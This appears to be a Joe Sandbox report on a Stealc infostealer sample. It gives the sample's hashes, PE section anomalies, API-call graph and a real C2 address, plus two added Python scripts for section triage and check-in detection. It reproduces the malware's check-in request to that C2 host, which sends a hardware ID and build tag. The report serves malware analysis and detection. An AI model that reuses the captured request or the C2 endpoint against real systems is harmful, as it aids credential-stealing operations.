                http://185.215.113.37 | file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/G | file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpS | file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1541160
                Start date and time: 2024-10-24 14:17:04 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 3m 5s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed: 1
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: file.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 87
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.exe
                No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/
                185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | g4Cyr2T5jq.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | LummaC, Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                        No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                WHOLESALECONNECTIONSNL | g4Cyr2T5jq.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.16
                WHOLESALECONNECTIONSNL | msqT9atzYW.exe | malicious | Amadey | 185.215.113.43
                WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Stealc | 185.215.113.16
                        No context
                        No context
                No created / dropped files found
                File type: PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit): 7.949218692389576
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name: file.exe
                File size: 1'836'032 bytes
                MD5: efb3596cf052ae112e2b81b16870436e
                SHA1: 266b9c7ace3a1371ef5e87eb55f4e65ecb5e2d57
                SHA256: 73de19773f529e65c1935196f7eb61206dad5ad17783a4412543c4bf0325bdc6
                SHA512: 9fca9b4d81512d404556b8b1be39bdd5acd9ddb4af66c921d3074474bfceca28f6943d816c3ea36211eae67cb4eeccf99ca0713692b9b5a4f2d57fdb83f16a9b
                SSDEEP: 24576:y+saJ72bxAtYqLHfmrMgxkagLZSbr7AojH2ccN4MHEDK7SFma/o5FbJC6LgW:yiw+Ys7asKrbqRtHrbawtCQ
                TLSH: FD8533EE8FD28D7BC9A490769283150CDFD2D8954D5CA1181E96E3362AE31E353C3A9C
                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash: 90cececece8e8eb0
                Entrypoint: 0xa9a000
                Entrypoint Section: .taggant
                Digitally signed: false
                Imagebase: 0x400000
                Subsystem: windows gui
                Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major: 5
                OS Version Minor: 1
                File Version Major: 5
                File Version Minor: 1
                Subsystem Version Major: 5
                Subsystem Version Minor: 1
                Import Hash: 2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007F1674F7896Ah
                        psrad mm3, qword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        and al, byte ptr [eax]
add byte ptr [eax], al (the same instruction repeated 67 times: a run of zero bytes following the jmp)
                        push es
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x25b000 | 0x22800 | 603514736a3aa348022c374f60b487b3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x25e000 | 0x2a0000 | 0x200 | af42d9509d719a85e15b99323cb5311a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
enilkfvu | 0x4fe000 | 0x19b000 | 0x19a200 | b36ff5d380d6b011ec6e75c0a6462283 | False | 0.9950591473636087 | data | 7.954611061577171 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cjtkqast | 0x699000 | 0x1000 | 0x400 | 0bcbd54a184f9ec0804f6f510daeee32 | False | 0.6611328125 | data | 5.372094779376595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x69a000 | 0x3000 | 0x2200 | 71291a579da5da9830d934a8ecee91e5 | False | 0.07192095588235294 | DOS executable (COM) | 0.788497548224364 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
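The section table above is what the report's static signatures react to: the entry point (0xa9a000, RVA 0x69a000) sits in .taggant rather than in a normal code section, two sections have no name at all, every executable section is also writable, the enilkfvu section has an entropy of 7.95, and the two unnamed sections are almost entirely virtual space with a few hundred bytes of raw data. The script below is an added example, not code from the Joe Sandbox report or from the sample: it builds a small PE32 image in memory whose section table only imitates the layout above (the real file is not reproduced), parses the headers back with struct, and reports the same properties. STANDARD_CODE_SECTIONS, HIGH_ENTROPY and VIRTUAL_RATIO are this example's own assumptions, not values used by the report.

```python
"""Static section triage for a PE32 image, reproducing the checks behind the
report's "Entry point lies outside standard sections", "PE file contains
section with special chars" and packed-section findings. Added example, not
code from the Joe Sandbox report or the sample: the image is constructed in
memory with struct and only imitates the report's section table.
STANDARD_CODE_SECTIONS and the two thresholds are this example's assumptions.
"""
import math
import random
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
STANDARD_CODE_SECTIONS = {".text", ".code", "CODE", "INIT"}  # assumption
HIGH_ENTROPY = 7.5   # assumption: bits/byte above which raw data looks packed
VIRTUAL_RATIO = 8    # assumption: vsize/raw ratio that marks an unpacking area


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty input."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def align(value: int, boundary: int) -> int:
    return -(-value // boundary) * boundary


def build_pe32(sections, entry_section, file_align=0x200, sect_align=0x1000) -> bytes:
    """Pack a minimal PE32 image: DOS stub, COFF and optional headers, section
    table, raw data. sections = [(name, virtual_size, raw_bytes, characteristics)];
    the entry point is placed at the start of sections[entry_section]."""
    headers_len = align(0x40 + 4 + 20 + 224 + 40 * len(sections), file_align)
    table, blobs, rvas, raw_off, rva = b"", b"", [], headers_len, sect_align
    for name, vsize, raw, chars in sections:
        raw_size = align(len(raw), file_align)
        rvas.append(rva)
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), vsize, rva,
                             raw_size, raw_off if raw_size else 0, 0, 0, 0, 0, chars)
        blobs += raw.ljust(raw_size, b"\0")
        raw_off += raw_size
        rva += align(vsize, sect_align)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, rvas[entry_section])       # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, sect_align, file_align)
    struct.pack_into("<II", opt, 56, rva, headers_len)         # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 92, 16)                        # NumberOfRvaAndSizes
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return head.ljust(headers_len, b"\0") + blobs


def parse_pe32(pe: bytes):
    """Read entry RVA, section alignment and the section table back out."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sect_align = struct.unpack_from("<I", pe, opt + 32)[0]
    sections = []
    for i in range(nsec):
        name, vsize, rva, raw_size, raw_off, _, _, _, _, chars = \
            struct.unpack_from("<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        raw = pe[raw_off:raw_off + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "rva": rva,
                         "vsize": vsize, "raw_size": raw_size, "chars": chars,
                         "entropy": entropy(raw)})
    return entry_rva, sect_align, sections


def triage(pe: bytes) -> dict:
    """Return the entry section and one finding string per suspicious property."""
    entry_rva, sect_align, sections = parse_pe32(pe)
    entry = next((s for s in sections
                  if s["rva"] <= entry_rva < s["rva"] + align(s["vsize"], sect_align)), None)
    findings = []
    if entry is None or entry["name"] not in STANDARD_CODE_SECTIONS:
        where = (entry["name"] or "<unnamed>") if entry else "no section"
        findings.append(f"entry point 0x{entry_rva:x} lies outside standard code sections ({where})")
    for s in sections:
        label = s["name"] or "<unnamed>"
        if not s["name"] or not all(c.isalnum() or c in "._$" for c in s["name"]):
            findings.append(f"section {label} has an empty or special-character name")
        if s["chars"] & RWX == RWX:
            findings.append(f"section {label} is readable, writable and executable")
        if s["entropy"] > HIGH_ENTROPY:
            findings.append(f"section {label} raw data entropy {s['entropy']:.2f} (packed or encrypted)")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["vsize"] > VIRTUAL_RATIO * max(s["raw_size"], 1):
            findings.append(f"section {label} is executable but mostly virtual (unpacking target)")
    return {"entry_section": entry["name"] if entry else None,
            "sections": sections, "findings": findings}


def sample_image() -> bytes:
    """Constructed image imitating the report's section table; NOT the real file."""
    rnd = random.Random(2024)
    packed = bytes(rnd.getrandbits(8) for _ in range(0x2000))  # stands in for the packed payload
    data_rwx = IMAGE_SCN_CNT_INITIALIZED_DATA | RWX
    data_rw = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    return build_pe32([
        ("", 0x25b000, b"\0" * 0x200, data_rwx),               # unnamed, almost all virtual
        (".rsrc", 0x1000, b"", data_rw),
        (".idata", 0x1000, b"\0" * 0x64, data_rw),
        ("", 0x2a0000, b"\0" * 0x200, data_rwx),
        ("enilkfvu", 0x2000, packed, data_rwx),                 # near-random bytes
        ("cjtkqast", 0x1000, b"\0" * 0x400, data_rwx),
        (".taggant", 0x3000, b"\xe9" + b"\0" * 0x21ff, data_rwx),  # jmp then zeros: entry point
    ], entry_section=6)


def clean_image() -> bytes:
    """A conventional layout for comparison (constructed)."""
    code = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    data = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    return build_pe32([(".text", 0x1000, b"\xc3" * 0x100, code),
                       (".data", 0x1000, b"\0" * 0x100, data)], entry_section=0)


if __name__ == "__main__":
    for finding in triage(sample_image())["findings"]:
        print(finding)
```

Running it prints eleven findings for the imitated layout (entry point in .taggant, two nameless sections, five RWX sections, one packed section, two mostly-virtual executable sections) and none for the conventional layout; pointing parse_pe32() at a real file read with open(path, "rb").read() works the same way, since it reads only the headers and the raw section bytes.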
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T14:18:02.241179+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 14:18:01.030793905 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 14:18:01.037185907 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 14:18:01.037280083 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 14:18:01.037431002 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 14:18:01.044307947 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 14:18:01.948930979 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 14:18:01.949054956 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 14:18:01.951911926 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 14:18:01.957319975 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 14:18:02.241003036 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 24, 2024 14:18:02.241178989 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 24, 2024 14:18:05.011349916 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                        • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 7264 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 14:18:01.037431002 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 24, 2024 14:18:01.948930979 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 12:18:01 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 24, 2024 14:18:01.951911926 CEST | 411 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG
Host: 185.215.113.37
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a
Data Ascii (line breaks restored from the 0d 0a pairs in Data Raw; the two form fields are hwid and build):
------EBAFBGIDHCBFHIECFCBG
Content-Disposition: form-data; name="hwid"

6977C7B1D24A563484146
------EBAFBGIDHCBFHIECFCBG
Content-Disposition: form-data; name="build"

doma
------EBAFBGIDHCBFHIECFCBG--
Oct 24, 2024 14:18:02.241003036 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 12:18:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64; decodes to "block")
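The exchange above is the whole of the sample's network activity in this run: a bare GET to the C2 host, then a multipart POST to /e2b1563c6670f193.php carrying a hardware id (hwid) and a build tag (build), answered with an 8-byte base64 token that decodes to "block"; no further requests, downloads or dropped files follow. Neither request carries a User-Agent header, and the Host header is a bare IP address, which is what makes this check-in cheap to spot on the wire. The script below is an added example, not part of the Joe Sandbox report and not the Emerging Threats rule (SID 2044243) that fired: it re-parses the captured request (REQUEST is reconstructed from the headers and Data Raw bytes shown above), extracts the multipart fields, decodes the reply, and applies a small set of heuristics of its own (the .php path, hwid/build fields, missing User-Agent, bare-IP Host) as flag_checkin().

```python
"""Parse and flag the Stealc check-in recorded in the HTTP traffic above.

Added example, not part of the Joe Sandbox report: REQUEST is reconstructed
from the report's own request headers and Data Raw bytes, and RESPONSE_BODY is
the reply it shows. The flag_checkin() heuristics are this example's own, not
the Emerging Threats rule (SID 2044243) that matched in the sandbox.
"""
import base64
import re

CRLF = b"\r\n"

# Reconstructed from the report (411 bytes: 201 of headers, 210 of body).
REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 210\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------EBAFBGIDHCBFHIECFCBG\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"6977C7B1D24A563484146\r\n"
    b"------EBAFBGIDHCBFHIECFCBG\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------EBAFBGIDHCBFHIECFCBG--\r\n"
)
RESPONSE_BODY = b"YmxvY2s="   # the 8-byte reply body the report shows


def parse_request(raw: bytes):
    """Split an HTTP/1.1 request into (method, path, headers, body);
    header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: value bytes} for a multipart/form-data body."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    delimiter = b"--" + m.group(1).encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):                 # closing delimiter
            break
        part_head, _, value = part.strip(CRLF).partition(CRLF + CRLF)
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode("ascii")] = value
    return fields


def decode_reply(body: bytes) -> str:
    """The C2 answers with a base64 token; the captured one decodes to 'block'."""
    return base64.b64decode(body, validate=True).decode("ascii")


def flag_checkin(raw: bytes) -> list:
    """Heuristics assumed by this example: a multipart POST to a .php path that
    carries hwid and build fields, with no User-Agent and a bare-IP Host."""
    method, path, headers, body = parse_request(raw)
    findings = []
    content_type = headers.get("content-type", "")
    if method != "POST" or not path.lower().endswith(".php") \
            or not content_type.startswith("multipart/form-data"):
        return findings
    if "user-agent" not in headers:
        findings.append("no User-Agent header")
    if {"hwid", "build"}.issubset(parse_multipart(body, content_type)):
        findings.append("hwid/build form fields: Stealc-style check-in")
    if headers.get("host", "").replace(".", "").isdigit():
        findings.append("Host header is a bare IPv4 address")
    return findings


if __name__ == "__main__":
    _, _, hdrs, body = parse_request(REQUEST)
    print(parse_multipart(body, hdrs["content-type"]), decode_reply(RESPONSE_BODY))
    print(flag_checkin(REQUEST))
```

The three heuristics are deliberately weak on their own (plenty of legitimate uploads go to a .php path), so in practice they belong together, and the hwid/build pair is the one that carries most of the weight; a proxy log that records request headers is enough to apply the User-Agent and Host checks retroactively.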


                        Target ID:0
                        Start time:08:17:57
                        Start date:24/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x910000
                        File size:1'836'032 bytes
                        MD5 hash:EFB3596CF052AE112E2B81B16870436E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                          Execution Graph

                          Execution Coverage:8.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:10.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
execution_graph (the node dump is condensed here to the API calls recoverable from the node labels; node ids and edges are omitted, and the source listing is truncated)
• 9269f0 -> 912260: dozens of sequential calls into 9145c0 (RtlAllocateHeap, VirtualProtect); 9126a0 repeats the same pattern several hundred times
• 929860 -> 929750 (GetPEB) -> 929a93: LoadLibraryA ×5, then GetProcAddress chains at 929af4, 929b16, 929b4f, 929b71 and 929b92
• 92a740, 92a750, 92a7a0, 92a820, 92a8a0: lstrcpy / lstrlen string helpers; 92a9b0: lstrlen, lstrcpy, lstrcat
• 9111d0 -> 911160 (GetSystemInfo) -> 911110 (GetCurrentProcess, VirtualAllocExNuma) -> 9110a0 (VirtualAlloc, VirtualFree) -> 9289b0 (GlobalMemoryStatusEx): each stage has an ExitProcess branch
• 926770: GetUserDefaultLangID with five separate ExitProcess branches
• 927850: GetProcessHeap, RtlAllocateHeap, GetUserNameA (ExitProcess branch at 9111c4); 9278e0: GetProcessHeap, RtlAllocateHeap, GetComputerNameA
• 926ac2: OpenEventA; if the event already exists, CloseHandle and Sleep, otherwise CreateEventA at 926ae1
• 926920: GetSystemTime -> 926820 -> sscanf -> 92a800 -> SystemTimeToFileTime ×2, with an ExitProcess branch at 9269d8
• 925b10 onward: 926430, 927500 (GetWindowsDirectoryA), 914880, 9217a0, 911590 (lstrcpy), 915960 (34 API calls), 921050, 920d90, 920f40, 921a10, 914fb0 (GetProcessHeap, RtlAllocateHeap, InternetOpenA), 920740, 921170
14256 9138c5 14255->14256 14257 9145c0 2 API calls 14256->14257 14258 9138de 14257->14258 14259 9145c0 2 API calls 14258->14259 14260 9138f7 14259->14260 14261 9145c0 2 API calls 14260->14261 14262 913910 14261->14262 14263 9145c0 2 API calls 14262->14263 14264 913929 14263->14264 14265 9145c0 2 API calls 14264->14265 14266 913942 14265->14266 14267 9145c0 2 API calls 14266->14267 14268 91395b 14267->14268 14269 9145c0 2 API calls 14268->14269 14270 913974 14269->14270 14271 9145c0 2 API calls 14270->14271 14272 91398d 14271->14272 14273 9145c0 2 API calls 14272->14273 14274 9139a6 14273->14274 14275 9145c0 2 API calls 14274->14275 14276 9139bf 14275->14276 14277 9145c0 2 API calls 14276->14277 14278 9139d8 14277->14278 14279 9145c0 2 API calls 14278->14279 14280 9139f1 14279->14280 14281 9145c0 2 API calls 14280->14281 14282 913a0a 14281->14282 14283 9145c0 2 API calls 14282->14283 14284 913a23 14283->14284 14285 9145c0 2 API calls 14284->14285 14286 913a3c 14285->14286 14287 9145c0 2 API calls 14286->14287 14288 913a55 14287->14288 14289 9145c0 2 API calls 14288->14289 14290 